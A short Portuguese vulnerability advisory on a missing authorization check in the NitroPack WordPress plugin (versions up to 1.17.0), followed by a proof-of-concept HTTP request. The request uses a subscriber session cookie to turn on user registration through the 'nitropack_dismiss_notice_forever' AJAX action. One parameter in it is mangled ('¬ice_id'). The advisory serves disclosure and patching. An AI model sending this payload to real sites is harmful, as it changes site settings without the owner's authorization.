
NitroPack <= 1.17.0 - Falta de Autorização para Atualização Limitada de Opções Autenticada (Subscriber+)
NitroPack <= 1.17.0 - Autorização Ausente para Atualização Limitada de Opções por Autenticados (Assinante+)
O plugin NitroPack para WordPress é vulnerável a modificação não autorizada de dados devido a uma verificação de capacidade ausente na ação AJAX 'nitropack_dismiss_notice_forever' em todas as versões até, e incluindo, 1.17.0. Isso possibilita que atacantes autenticados, com acesso de nível de assinante e superior, atualizem opções arbitrárias para um valor fixo de '1', o que pode ativar certas opções (por exemplo, ativar registro de usuários) ou modificar certas opções de forma que leve a uma condição de negação de serviço.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal:8929
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_logged_in_f0174336378e6db874da2237e8c05ac1=subscriber%7C1737110766%7CYhdLxJv5qLyqmSVznKzPOC94NyU9PAMWPeef9cCtINN%7C8c6d11f15397dfb790e700f695c7480bb8267c86130c402afce6080076ccff2d
Content-Length: 88
action=nitropack_dismiss_notice_forever&security=92f60ea3ea¬ice_id=users_can_register